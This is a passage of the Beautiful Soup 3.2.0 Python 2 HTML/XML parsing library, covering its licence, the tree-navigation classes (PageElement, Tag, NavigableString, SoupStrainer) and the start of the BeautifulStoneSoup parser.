Beautiful Soup works with Python 2.2 and up. It has no external
dependencies, but you'll have more success at converting data to UTF-8
if you also install these three packages:
* chardet, for auto-detecting character encodings
http://chardet.feedparser.org/
* cjkcodecs and iconv_codec, which add more encodings to the ones supported
by stock Python.
http://cjkpython.i18n.org/
Beautiful Soup defines classes for two main parsing strategies:
* BeautifulStoneSoup, for parsing XML, SGML, or your domain-specific
language that kind of looks like XML.
* BeautifulSoup, for parsing run-of-the-mill HTML code, be it valid
or invalid. This class has web browser-like heuristics for
obtaining a sensible parse tree in the face of common HTML errors.
Beautiful Soup also defines a class (UnicodeDammit) for autodetecting
the encoding of an HTML or XML document, and converting it to
Unicode. Much of this code is taken from Mark Pilgrim's Universal Feed Parser.
For more than you ever wanted to know about Beautiful Soup, see the
documentation:
http://www.crummy.com/software/BeautifulSoup/documentation.html
Here, have some legalese:
Copyright (c) 2004-2010, Leonard Richardson
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above
copyright notice, this list of conditions and the following
disclaimer in the documentation and/or other materials provided
with the distribution.
* Neither the name of the the Beautiful Soup Consortium and All
Night Kosher Bakery nor the names of its contributors may be
used to endorse or promote products derived from this software
without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE, DAMMIT.
"""
from __future__ import generators
__author__ = "Leonard Richardson (leonardr@segfault.org)"
__version__ = "3.2.0"
__copyright__ = "Copyright (c) 2004-2010 Leonard Richardson"
__license__ = "New-style BSD"
from sgmllib import SGMLParser, SGMLParseError
import codecs
import markupbase
import types
import re
import sgmllib
try:
from htmlentitydefs import name2codepoint
except ImportError:
name2codepoint = {}
try:
set
except NameError:
from sets import Set as set
#These hacks make Beautiful Soup able to parse XML with namespaces
sgmllib.tagfind = re.compile('[a-zA-Z][-_.:a-zA-Z0-9]*')
markupbase._declname_match = re.compile(r'[a-zA-Z][-_.:a-zA-Z0-9]*\s*').match
DEFAULT_OUTPUT_ENCODING = "utf-8"
def _match_css_class(str):
"""Build a RE to match the given CSS class."""
return re.compile(r"(^|.*\s)%s($|\s)" % str)
# First, the classes that represent markup elements.
class PageElement(object):
"""Contains the navigational information for some part of the page
(either a tag or a piece of text)"""
def setup(self, parent=None, previous=None):
"""Sets up the initial relations between this element and
other elements."""
self.parent = parent
self.previous = previous
self.next = None
self.previousSibling = None
self.nextSibling = None
if self.parent and self.parent.contents:
self.previousSibling = self.parent.contents[-1]
self.previousSibling.nextSibling = self
def replaceWith(self, replaceWith):
oldParent = self.parent
myIndex = self.parent.index(self)
if hasattr(replaceWith, "parent")\
and replaceWith.parent is self.parent:
# We're replacing this element with one of its siblings.
index = replaceWith.parent.index(replaceWith)
if index and index < myIndex:
# Furthermore, it comes before this element. That
# means that when we extract it, the index of this
# element will change.
myIndex = myIndex - 1
self.extract()
oldParent.insert(myIndex, replaceWith)
def replaceWithChildren(self):
myParent = self.parent
myIndex = self.parent.index(self)
self.extract()
reversedChildren = list(self.contents)
reversedChildren.reverse()
for child in reversedChildren:
myParent.insert(myIndex, child)
def extract(self):
"""Destructively rips this element out of the tree."""
if self.parent:
try:
del self.parent.contents[self.parent.index(self)]
except ValueError:
pass
#Find the two elements that would be next to each other if
#this element (and any children) hadn't been parsed. Connect
#the two.
lastChild = self._lastRecursiveChild()
nextElement = lastChild.next
if self.previous:
self.previous.next = nextElement
if nextElement:
nextElement.previous = self.previous
self.previous = None
lastChild.next = None
self.parent = None
if self.previousSibling:
self.previousSibling.nextSibling = self.nextSibling
if self.nextSibling:
self.nextSibling.previousSibling = self.previousSibling
self.previousSibling = self.nextSibling = None
return self
def _lastRecursiveChild(self):
"Finds the last element beneath this object to be parsed."
lastChild = self
while hasattr(lastChild, 'contents') and lastChild.contents:
lastChild = lastChild.contents[-1]
return lastChild
def insert(self, position, newChild):
if isinstance(newChild, basestring) \
and not isinstance(newChild, NavigableString):
newChild = NavigableString(newChild)
position = min(position, len(self.contents))
if hasattr(newChild, 'parent') and newChild.parent is not None:
# We're 'inserting' an element that's already one
# of this object's children.
if newChild.parent is self:
index = self.index(newChild)
if index > position:
# Furthermore we're moving it further down the
# list of this object's children. That means that
# when we extract this element, our target index
# will jump down one.
position = position - 1
newChild.extract()
newChild.parent = self
previousChild = None
if position == 0:
newChild.previousSibling = None
newChild.previous = self
else:
previousChild = self.contents[position-1]
newChild.previousSibling = previousChild
newChild.previousSibling.nextSibling = newChild
newChild.previous = previousChild._lastRecursiveChild()
if newChild.previous:
newChild.previous.next = newChild
newChildsLastElement = newChild._lastRecursiveChild()
if position >= len(self.contents):
newChild.nextSibling = None
parent = self
parentsNextSibling = None
while not parentsNextSibling:
parentsNextSibling = parent.nextSibling
parent = parent.parent
if not parent: # This is the last element in the document.
break
if parentsNextSibling:
newChildsLastElement.next = parentsNextSibling
else:
newChildsLastElement.next = None
else:
nextChild = self.contents[position]
newChild.nextSibling = nextChild
if newChild.nextSibling:
newChild.nextSibling.previousSibling = newChild
newChildsLastElement.next = nextChild
if newChildsLastElement.next:
newChildsLastElement.next.previous = newChildsLastElement
self.contents.insert(position, newChild)
def append(self, tag):
"""Appends the given tag to the contents of this tag."""
self.insert(len(self.contents), tag)
def findNext(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the first item that matches the given criteria and
appears after this Tag in the document."""
return self._findOne(self.findAllNext, name, attrs, text, **kwargs)
def findAllNext(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns all items that match the given criteria and appear
after this Tag in the document."""
return self._findAll(name, attrs, text, limit, self.nextGenerator,
**kwargs)
def findNextSibling(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears after this Tag in the document."""
return self._findOne(self.findNextSiblings, name, attrs, text,
**kwargs)
def findNextSiblings(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns the siblings of this Tag that match the given
criteria and appear after this Tag in the document."""
return self._findAll(name, attrs, text, limit,
self.nextSiblingGenerator, **kwargs)
fetchNextSiblings = findNextSiblings # Compatibility with pre-3.x
def findPrevious(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the first item that matches the given criteria and
appears before this Tag in the document."""
return self._findOne(self.findAllPrevious, name, attrs, text, **kwargs)
def findAllPrevious(self, name=None, attrs={}, text=None, limit=None,
**kwargs):
"""Returns all items that match the given criteria and appear
before this Tag in the document."""
return self._findAll(name, attrs, text, limit, self.previousGenerator,
**kwargs)
fetchPrevious = findAllPrevious # Compatibility with pre-3.x
def findPreviousSibling(self, name=None, attrs={}, text=None, **kwargs):
"""Returns the closest sibling to this Tag that matches the
given criteria and appears before this Tag in the document."""
return self._findOne(self.findPreviousSiblings, name, attrs, text,
**kwargs)
def findPreviousSiblings(self, name=None, attrs={}, text=None,
limit=None, **kwargs):
"""Returns the siblings of this Tag that match the given
criteria and appear before this Tag in the document."""
return self._findAll(name, attrs, text, limit,
self.previousSiblingGenerator, **kwargs)
fetchPreviousSiblings = findPreviousSiblings # Compatibility with pre-3.x
def findParent(self, name=None, attrs={}, **kwargs):
"""Returns the closest parent of this Tag that matches the given
criteria."""
# NOTE: We can't use _findOne because findParents takes a different
# set of arguments.
r = None
l = self.findParents(name, attrs, 1)
if l:
r = l[0]
return r
def findParents(self, name=None, attrs={}, limit=None, **kwargs):
"""Returns the parents of this Tag that match the given
criteria."""
return self._findAll(name, attrs, None, limit, self.parentGenerator,
**kwargs)
fetchParents = findParents # Compatibility with pre-3.x
#These methods do the real heavy lifting.
def _findOne(self, method, name, attrs, text, **kwargs):
r = None
l = method(name, attrs, text, 1, **kwargs)
if l:
r = l[0]
return r
def _findAll(self, name, attrs, text, limit, generator, **kwargs):
"Iterates over a generator looking for things that match."
if isinstance(name, SoupStrainer):
strainer = name
# (Possibly) special case some findAll*(...) searches
elif text is None and not limit and not attrs and not kwargs:
# findAll*(True)
if name is True:
return [element for element in generator()
if isinstance(element, Tag)]
# findAll*('tag-name')
elif isinstance(name, basestring):
return [element for element in generator()
if isinstance(element, Tag) and
element.name == name]
else:
strainer = SoupStrainer(name, attrs, text, **kwargs)
# Build a SoupStrainer
else:
strainer = SoupStrainer(name, attrs, text, **kwargs)
results = ResultSet(strainer)
g = generator()
while True:
try:
i = g.next()
except StopIteration:
break
if i:
found = strainer.search(i)
if found:
results.append(found)
if limit and len(results) >= limit:
break
return results
#These Generators can be used to navigate starting from both
#NavigableStrings and Tags.
def nextGenerator(self):
i = self
while i is not None:
i = i.next
yield i
def nextSiblingGenerator(self):
i = self
while i is not None:
i = i.nextSibling
yield i
def previousGenerator(self):
i = self
while i is not None:
i = i.previous
yield i
def previousSiblingGenerator(self):
i = self
while i is not None:
i = i.previousSibling
yield i
def parentGenerator(self):
i = self
while i is not None:
i = i.parent
yield i
# Utility methods
def substituteEncoding(self, str, encoding=None):
encoding = encoding or "utf-8"
return str.replace("%SOUP-ENCODING%", encoding)
def toEncoding(self, s, encoding=None):
"""Encodes an object to a string in some encoding, or to Unicode.
."""
if isinstance(s, unicode):
if encoding:
s = s.encode(encoding)
elif isinstance(s, str):
if encoding:
s = s.encode(encoding)
else:
s = unicode(s)
else:
if encoding:
s = self.toEncoding(str(s), encoding)
else:
s = unicode(s)
return s
class NavigableString(unicode, PageElement):
def __new__(cls, value):
"""Create a new NavigableString.
When unpickling a NavigableString, this method is called with
the string in DEFAULT_OUTPUT_ENCODING. That encoding needs to be
passed in to the superclass's __new__ or the superclass won't know
how to handle non-ASCII characters.
"""
if isinstance(value, unicode):
return unicode.__new__(cls, value)
return unicode.__new__(cls, value, DEFAULT_OUTPUT_ENCODING)
def __getnewargs__(self):
return (NavigableString.__str__(self),)
def __getattr__(self, attr):
"""text.string gives you text. This is for backwards
compatibility for Navigable*String, but for CData* it lets you
get the string without the CData wrapper."""
if attr == 'string':
return self
else:
raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__.__name__, attr)
def __unicode__(self):
return str(self).decode(DEFAULT_OUTPUT_ENCODING)
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
if encoding:
return self.encode(encoding)
else:
return self
class CData(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
return "<![CDATA[%s]]>" % NavigableString.__str__(self, encoding)
class ProcessingInstruction(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
output = self
if "%SOUP-ENCODING%" in output:
output = self.substituteEncoding(output, encoding)
return "<?%s?>" % self.toEncoding(output, encoding)
class Comment(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
return "<!--%s-->" % NavigableString.__str__(self, encoding)
class Declaration(NavigableString):
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING):
return "<!%s>" % NavigableString.__str__(self, encoding)
class Tag(PageElement):
"""Represents a found HTML tag with its attributes and contents."""
def _invert(h):
"Cheap function to invert a hash."
i = {}
for k,v in h.items():
i[v] = k
return i
XML_ENTITIES_TO_SPECIAL_CHARS = { "apos" : "'",
"quot" : '"',
"amp" : "&",
"lt" : "<",
"gt" : ">" }
XML_SPECIAL_CHARS_TO_ENTITIES = _invert(XML_ENTITIES_TO_SPECIAL_CHARS)
def _convertEntities(self, match):
"""Used in a call to re.sub to replace HTML, XML, and numeric
entities with the appropriate Unicode characters. If HTML
entities are being converted, any unrecognized entities are
escaped."""
x = match.group(1)
if self.convertHTMLEntities and x in name2codepoint:
return unichr(name2codepoint[x])
elif x in self.XML_ENTITIES_TO_SPECIAL_CHARS:
if self.convertXMLEntities:
return self.XML_ENTITIES_TO_SPECIAL_CHARS[x]
else:
return u'&%s;' % x
elif len(x) > 0 and x[0] == '#':
# Handle numeric entities
if len(x) > 1 and x[1] == 'x':
return unichr(int(x[2:], 16))
else:
return unichr(int(x[1:]))
elif self.escapeUnrecognizedEntities:
return u'&%s;' % x
else:
return u'&%s;' % x
def __init__(self, parser, name, attrs=None, parent=None,
previous=None):
"Basic constructor."
# We don't actually store the parser object: that lets extracted
# chunks be garbage-collected
self.parserClass = parser.__class__
self.isSelfClosing = parser.isSelfClosingTag(name)
self.name = name
if attrs is None:
attrs = []
elif isinstance(attrs, dict):
attrs = attrs.items()
self.attrs = attrs
self.contents = []
self.setup(parent, previous)
self.hidden = False
self.containsSubstitutions = False
self.convertHTMLEntities = parser.convertHTMLEntities
self.convertXMLEntities = parser.convertXMLEntities
self.escapeUnrecognizedEntities = parser.escapeUnrecognizedEntities
# Convert any HTML, XML, or numeric entities in the attribute values.
convert = lambda(k, val): (k,
re.sub("&(#\d+|#x[0-9a-fA-F]+|\w+);",
self._convertEntities,
val))
self.attrs = map(convert, self.attrs)
def getString(self):
if (len(self.contents) == 1
and isinstance(self.contents[0], NavigableString)):
return self.contents[0]
def setString(self, string):
"""Replace the contents of the tag with a string"""
self.clear()
self.append(string)
string = property(getString, setString)
def getText(self, separator=u""):
if not len(self.contents):
return u""
stopNode = self._lastRecursiveChild().next
strings = []
current = self.contents[0]
while current is not stopNode:
if isinstance(current, NavigableString):
strings.append(current.strip())
current = current.next
return separator.join(strings)
text = property(getText)
def get(self, key, default=None):
"""Returns the value of the 'key' attribute for the tag, or
the value given for 'default' if it doesn't have that
attribute."""
return self._getAttrMap().get(key, default)
def clear(self):
"""Extract all children."""
for child in self.contents[:]:
child.extract()
def index(self, element):
for i, child in enumerate(self.contents):
if child is element:
return i
raise ValueError("Tag.index: element not in tag")
def has_key(self, key):
return self._getAttrMap().has_key(key)
def __getitem__(self, key):
"""tag[key] returns the value of the 'key' attribute for the tag,
and throws an exception if it's not there."""
return self._getAttrMap()[key]
def __iter__(self):
"Iterating over a tag iterates over its contents."
return iter(self.contents)
def __len__(self):
"The length of a tag is the length of its list of contents."
return len(self.contents)
def __contains__(self, x):
return x in self.contents
def __nonzero__(self):
"A tag is non-None even if it has no contents."
return True
def __setitem__(self, key, value):
"""Setting tag[key] sets the value of the 'key' attribute for the
tag."""
self._getAttrMap()
self.attrMap[key] = value
found = False
for i in xrange(0, len(self.attrs)):
if self.attrs[i][0] == key:
self.attrs[i] = (key, value)
found = True
if not found:
self.attrs.append((key, value))
self._getAttrMap()[key] = value
def __delitem__(self, key):
"Deleting tag[key] deletes all 'key' attributes for the tag."
for item in self.attrs:
if item[0] == key:
self.attrs.remove(item)
#We don't break because bad HTML can define the same
#attribute multiple times.
self._getAttrMap()
if self.attrMap.has_key(key):
del self.attrMap[key]
def __call__(self, *args, **kwargs):
"""Calling a tag like a function is the same as calling its
findAll() method. Eg. tag('a') returns a list of all the A tags
found within this tag."""
return apply(self.findAll, args, kwargs)
def __getattr__(self, tag):
#print "Getattr %s.%s" % (self.__class__, tag)
if len(tag) > 3 and tag.rfind('Tag') == len(tag)-3:
return self.find(tag[:-3])
elif tag.find('__') != 0:
return self.find(tag)
raise AttributeError, "'%s' object has no attribute '%s'" % (self.__class__, tag)
def __eq__(self, other):
"""Returns true iff this tag has the same name, the same attributes,
and the same contents (recursively) as the given tag.
NOTE: right now this will return false if two tags have the
same attributes in a different order. Should this be fixed?"""
if other is self:
return True
if not hasattr(other, 'name') or not hasattr(other, 'attrs') or not hasattr(other, 'contents') or self.name != other.name or self.attrs != other.attrs or len(self) != len(other):
return False
for i in xrange(0, len(self.contents)):
if self.contents[i] != other.contents[i]:
return False
return True
def __ne__(self, other):
"""Returns true iff this tag is not identical to the other tag,
as defined in __eq__."""
return not self == other
def __repr__(self, encoding=DEFAULT_OUTPUT_ENCODING):
"""Renders this tag as a string."""
return self.__str__(encoding)
def __unicode__(self):
return self.__str__(None)
BARE_AMPERSAND_OR_BRACKET = re.compile("([<>]|"
+ "&(?!#\d+;|#x[0-9a-fA-F]+;|\w+;)"
+ ")")
def _sub_entity(self, x):
"""Used with a regular expression to substitute the
appropriate XML entity for an XML special character."""
return "&" + self.XML_SPECIAL_CHARS_TO_ENTITIES[x.group(0)[0]] + ";"
def __str__(self, encoding=DEFAULT_OUTPUT_ENCODING,
prettyPrint=False, indentLevel=0):
"""Returns a string or Unicode representation of this tag and
its contents. To get Unicode, pass None for encoding.
NOTE: since Python's HTML parser consumes whitespace, this
method is not certain to reproduce the whitespace present in
the original string."""
encodedName = self.toEncoding(self.name, encoding)
attrs = []
if self.attrs:
for key, val in self.attrs:
fmt = '%s="%s"'
if isinstance(val, basestring):
if self.containsSubstitutions and '%SOUP-ENCODING%' in val:
val = self.substituteEncoding(val, encoding)
# The attribute value either:
#
# * Contains no embedded double quotes or single quotes.
# No problem: we enclose it in double quotes.
# * Contains embedded single quotes. No problem:
# double quotes work here too.
# * Contains embedded double quotes. No problem:
# we enclose it in single quotes.
# * Embeds both single _and_ double quotes. This
# can't happen naturally, but it can happen if
# you modify an attribute value after parsing
# the document. Now we have a bit of a
# problem. We solve it by enclosing the
# attribute in single quotes, and escaping any
# embedded single quotes to XML entities.
if '"' in val:
fmt = "%s='%s'"
if "'" in val:
# TODO: replace with apos when
# appropriate.
val = val.replace("'", "&squot;")
# Now we're okay w/r/t quotes. But the attribute
# value might also contain angle brackets, or
# ampersands that aren't part of entities. We need
# to escape those to XML entities too.
val = self.BARE_AMPERSAND_OR_BRACKET.sub(self._sub_entity, val)
attrs.append(fmt % (self.toEncoding(key, encoding),
self.toEncoding(val, encoding)))
close = ''
closeTag = ''
if self.isSelfClosing:
close = ' /'
else:
closeTag = '</%s>' % encodedName
indentTag, indentContents = 0, 0
if prettyPrint:
indentTag = indentLevel
space = (' ' * (indentTag-1))
indentContents = indentTag + 1
contents = self.renderContents(encoding, prettyPrint, indentContents)
if self.hidden:
s = contents
else:
s = []
attributeString = ''
if attrs:
attributeString = ' ' + ' '.join(attrs)
if prettyPrint:
s.append(space)
s.append('<%s%s%s>' % (encodedName, attributeString, close))
if prettyPrint:
s.append("\n")
s.append(contents)
if prettyPrint and contents and contents[-1] != "\n":
s.append("\n")
if prettyPrint and closeTag:
s.append(space)
s.append(closeTag)
if prettyPrint and closeTag and self.nextSibling:
s.append("\n")
s = ''.join(s)
return s
def decompose(self):
"""Recursively destroys the contents of this tree."""
self.extract()
if len(self.contents) == 0:
return
current = self.contents[0]
while current is not None:
next = current.next
if isinstance(current, Tag):
del current.contents[:]
current.parent = None
current.previous = None
current.previousSibling = None
current.next = None
current.nextSibling = None
current = next
def prettify(self, encoding=DEFAULT_OUTPUT_ENCODING):
return self.__str__(encoding, True)
def renderContents(self, encoding=DEFAULT_OUTPUT_ENCODING,
prettyPrint=False, indentLevel=0):
"""Renders the contents of this tag as a string in the given
encoding. If encoding is None, returns a Unicode string.."""
s=[]
for c in self:
text = None
if isinstance(c, NavigableString):
text = c.__str__(encoding)
elif isinstance(c, Tag):
s.append(c.__str__(encoding, prettyPrint, indentLevel))
if text and prettyPrint:
text = text.strip()
if text:
if prettyPrint:
s.append(" " * (indentLevel-1))
s.append(text)
if prettyPrint:
s.append("\n")
return ''.join(s)
#Soup methods
def find(self, name=None, attrs={}, recursive=True, text=None,
**kwargs):
"""Return only the first child of this Tag matching the given
criteria."""
r = None
l = self.findAll(name, attrs, recursive, text, 1, **kwargs)
if l:
r = l[0]
return r
findChild = find
def findAll(self, name=None, attrs={}, recursive=True, text=None,
limit=None, **kwargs):
"""Extracts a list of Tag objects that match the given
criteria. You can specify the name of the Tag and any
attributes you want the Tag to have.
The value of a key-value pair in the 'attrs' map can be a
string, a list of strings, a regular expression object, or a
callable that takes a string and returns whether or not the
string matches for some custom definition of 'matches'. The
same is true of the tag name."""
generator = self.recursiveChildGenerator
if not recursive:
generator = self.childGenerator
return self._findAll(name, attrs, text, limit, generator, **kwargs)
findChildren = findAll
# Pre-3.x compatibility methods
first = find
fetch = findAll
def fetchText(self, text=None, recursive=True, limit=None):
return self.findAll(text=text, recursive=recursive, limit=limit)
def firstText(self, text=None, recursive=True):
return self.find(text=text, recursive=recursive)
#Private methods
def _getAttrMap(self):
"""Initializes a map representation of this tag's attributes,
if not already initialized."""
if not getattr(self, 'attrMap'):
self.attrMap = {}
for (key, value) in self.attrs:
self.attrMap[key] = value
return self.attrMap
#Generator methods
def childGenerator(self):
# Just use the iterator from the contents
return iter(self.contents)
def recursiveChildGenerator(self):
if not len(self.contents):
raise StopIteration
stopNode = self._lastRecursiveChild().next
current = self.contents[0]
while current is not stopNode:
yield current
current = current.next
# Next, a couple classes to represent queries and their results.
class SoupStrainer:
"""Encapsulates a number of ways of matching a markup element (tag or
text)."""
def __init__(self, name=None, attrs={}, text=None, **kwargs):
self.name = name
if isinstance(attrs, basestring):
kwargs['class'] = _match_css_class(attrs)
attrs = None
if kwargs:
if attrs:
attrs = attrs.copy()
attrs.update(kwargs)
else:
attrs = kwargs
self.attrs = attrs
self.text = text
def __str__(self):
if self.text:
return self.text
else:
return "%s|%s" % (self.name, self.attrs)
def searchTag(self, markupName=None, markupAttrs={}):
found = None
markup = None
if isinstance(markupName, Tag):
markup = markupName
markupAttrs = markup
callFunctionWithTagData = callable(self.name) \
and not isinstance(markupName, Tag)
if (not self.name) \
or callFunctionWithTagData \
or (markup and self._matches(markup, self.name)) \
or (not markup and self._matches(markupName, self.name)):
if callFunctionWithTagData:
match = self.name(markupName, markupAttrs)
else:
match = True
markupAttrMap = None
for attr, matchAgainst in self.attrs.items():
if not markupAttrMap:
if hasattr(markupAttrs, 'get'):
markupAttrMap = markupAttrs
else:
markupAttrMap = {}
for k,v in markupAttrs:
markupAttrMap[k] = v
attrValue = markupAttrMap.get(attr)
if not self._matches(attrValue, matchAgainst):
match = False
break
if match:
if markup:
found = markup
else:
found = markupName
return found
def search(self, markup):
#print 'looking for %s in %s' % (self, markup)
found = None
# If given a list of items, scan it for a text element that
# matches.
if hasattr(markup, "__iter__") \
and not isinstance(markup, Tag):
for element in markup:
if isinstance(element, NavigableString) \
and self.search(element):
found = element
break
# If it's a Tag, make sure its name or attributes match.
# Don't bother with Tags if we're searching for text.
elif isinstance(markup, Tag):
if not self.text:
found = self.searchTag(markup)
# If it's text, make sure the text matches.
elif isinstance(markup, NavigableString) or \
isinstance(markup, basestring):
if self._matches(markup, self.text):
found = markup
else:
raise Exception, "I don't know how to match against a %s" \
% markup.__class__
return found
def _matches(self, markup, matchAgainst):
#print "Matching %s against %s" % (markup, matchAgainst)
result = False
if matchAgainst is True:
result = markup is not None
elif callable(matchAgainst):
result = matchAgainst(markup)
else:
#Custom match methods take the tag as an argument, but all
#other ways of matching match the tag name as a string.
if isinstance(markup, Tag):
markup = markup.name
if markup and not isinstance(markup, basestring):
markup = unicode(markup)
#Now we know that chunk is either a string, or None.
if hasattr(matchAgainst, 'match'):
# It's a regexp object.
result = markup and matchAgainst.search(markup)
elif hasattr(matchAgainst, '__iter__'): # list-like
result = markup in matchAgainst
elif hasattr(matchAgainst, 'items'):
result = markup.has_key(matchAgainst)
elif matchAgainst and isinstance(markup, basestring):
if isinstance(markup, unicode):
matchAgainst = unicode(matchAgainst)
else:
matchAgainst = str(matchAgainst)
if not result:
result = matchAgainst == markup
return result
class ResultSet(list):
"""A ResultSet is just a list that keeps track of the SoupStrainer
that created it."""
def __init__(self, source):
list.__init__([])
self.source = source
# Now, some helper functions.
def buildTagMap(default, *args):
"""Turns a list of maps, lists, or scalars into a single map.
Used to build the SELF_CLOSING_TAGS, NESTABLE_TAGS, and
NESTING_RESET_TAGS maps out of lists and partial maps."""
built = {}
for portion in args:
if hasattr(portion, 'items'):
#It's a map. Merge it.
for k,v in portion.items():
built[k] = v
elif hasattr(portion, '__iter__'): # is a list
#It's a list. Map each item to the default.
for k in portion:
built[k] = default
else:
#It's a scalar. Map it to the default.
built[portion] = default
return built
# Now, the parser classes.
class BeautifulStoneSoup(Tag, SGMLParser):
"""This class contains the basic parser and search code. It defines
a parser that knows nothing about tag behavior except for the
following:
You can't close a tag without closing all the tags it encloses.
That is, "<foo><bar></foo>" actually means
"<foo><bar></bar></foo>".
[Another possible explanation is "<foo><bar /></foo>", but since
this class defines no SELF_CLOSING_TAGS, it will never use that
explanation.]
This class is useful for parsing XML or made-up markup languages,
or when BeautifulSoup makes an assumption counter to what you were
expecting."""
SELF_CLOSING_TAGS = {}
NESTABLE_TAGS = {}
RESET_NESTING_TAGS = {}
QUOTE_TAGS = {}
PRESERVE_WHITESPACE_TAGS = []
MARKUP_MASSAGE = [(re.compile('(<[^<>]*)/>'),
lambda x: x.group(1) + ' />'),
(re.compile('<!\s+([^<>]*)>'),
lambda x: '<!' + x.group(1) + '>')
]
ROOT_TAG_NAME = u'[document]'
HTML_ENTITIES = "html"
XML_ENTITIES = "xml"
XHTML_ENTITIES = "xhtml"
# TODO: This only exists for backwards-compatibility
ALL_ENTITIES = XHTML_ENTITIES
# Used when determining whether a text node is all whitespace and
# can be replaced with a single space. A text node that contains
# fancy Unicode spaces (usually non-breaking) should be left
# alone.
STRIP_ASCII_SPACES = { 9: None, 10: None, 12: None, 13: None, 32: None, }
def __init__(self, markup="", parseOnlyThese=None, fromEncoding=None,
markupMassage=True, smartQuotesTo=XML_ENTITIES,
convertEntities=None, selfClosingTags=None, isHTML=False):
"""The Soup object is initialized as the 'root tag', and the
provided markup (which can be a string or a file-like object)
is fed into the underlying parser.
sgmllib will process most bad HTML, and the BeautifulSoup
class has some tricks for dealing with some HTML that kills
sgmllib, but Beautiful Soup can nonetheless choke or lose data
if your data uses self-closing tags or declarations
incorrectly.
By default, Beautiful Soup uses regexes to sanitize input,
avoiding the vast majority of these problems. If the problems
don't apply to you, pass in False for markupMassage, and
you'll get better performance.
The default parser massage techniques fix the two most common
instances of invalid HTML that choke sgmllib:
<br/> (No space between name of closing tag and tag close)
<! --Comment--> (Extraneous whitespace in declaration)
You can pass in a custom list of (RE object, replace method)
tuples to get Beautiful Soup to scrub your input the way you
want."""
self.parseOnlyThese = parseOnlyThese
self.fromEncoding = fromEncoding
self.smartQuotesTo = smartQuotesTo
self.convertEntities = convertEntities
# Set the rules for how we'll deal with the entities we
# encounter
if self.convertEntities:
# It doesn't make sense to convert encoded characters to
# entities even while you're converting entities to Unicode.
# Just convert it all to Unicode.
self.smartQuotesTo = None
if convertEntities == self.HTML_ENTITIES:
self.convertXMLEntities = False
self.convertHTMLEntities = True
self.escapeUnrecognizedEntities = True
elif convertEntities == self.XHTML_ENTITIES:
self.convertXMLEntities = True
self.convertHTMLEntities = True
self.escapeUnrecognizedEntities = False
elif convertEntities == self.XML_ENTITIES:
self.convertXMLEntities = True
self.convertHTMLEntities = False
self.escapeUnrecognizedEntities = False
else:
self.convertXMLEntities = False
self.convertHTMLEntities = False
self.escapeUnrecognizedEntities = False
self.instanceSelfClosingTags = buildTagMap(None, selfClosingTags)
SGMLParser.__init__(self)
if hasattr(markup, 'read'): # It's a file-type object.
markup = markup.read()
self.markup = markup
self.markupMassage = markupMassage
try:
self._feed(isHTML=isHTML)
except StopParsing:
pass
self.markup = None # The markup can now be GCed
def convert_charref(self, name):
"""This method fixes a bug in Python's SGMLParser."""
try:
n = int(name)
except ValueError:
return
if not 0 <= n <= 127 : # ASCII ends at 127, not 255
return
return self.convert_codepoint(n)
def _feed(self, inDocumentEncoding=None, isHTML=False):
# Convert the document to Unicode.
markup = self.markup
if isinstance(markup, unicode):
if not hasattr(self, 'originalEncoding'):
self.originalEncoding = None
else:
dammit = UnicodeDammit\
(markup, [self.fromEncoding, inDocumentEncoding],
smartQuotesTo=self.smartQuotesTo, isHTML=isHTML)
markup = dammit.unicode
self.originalEncoding = dammit.originalEncoding
self.declaredHTMLEncoding = dammit.declaredHTMLEncoding
if markup:
if self.markupMassage:
if not hasattr(self.markupMassage, "__iter__"):
self.markupMassage = self.MARKUP_MASSAGE
for fix, m in self.markupMassage:
markup = fix.sub(m, markup)
# TODO: We get rid of markupMassage so that the
# soup object can be deepcopied later on. Some
# Python installations can't copy regexes. If anyone
# was relying on the existence of markupMassage, this
# might cause problems.
del(self.markupMassage)
self.reset()
SGMLParser.feed(self, markup)
# Close out any unfinished strings and close all the open tags.
self.endData()
while self.currentTag.name != self.ROOT_TAG_NAME:
self.popTag()
def __getattr__(self, methodName):
"""This method routes method call requests to either the SGMLParser
superclass or the Tag superclass, depending on the method name."""
#print "__getattr__ called on %s.%s" % (self.__class__, methodName)
if methodName.startswith('start_') or methodName.startswith('end_') \
or methodName.startswith('do_'):
return SGMLParser.__getattr__(self, methodName)
elif not methodName.startswith('__'):
return Tag.__getattr__(self, methodName)
else:
raise AttributeError
def isSelfClosingTag(self, name):
"""Returns true iff the given string is the name of a
self-closing tag according to this parser."""
return self.SELF_CLOSING_TAGS.has_key(name) \
or self.instanceSelfClosingTags.has_key(name)
def reset(self):
Tag.__init__(self, self, self.ROOT_TAG_NAME)
self.hidden = 1
SGMLParser.reset(self)
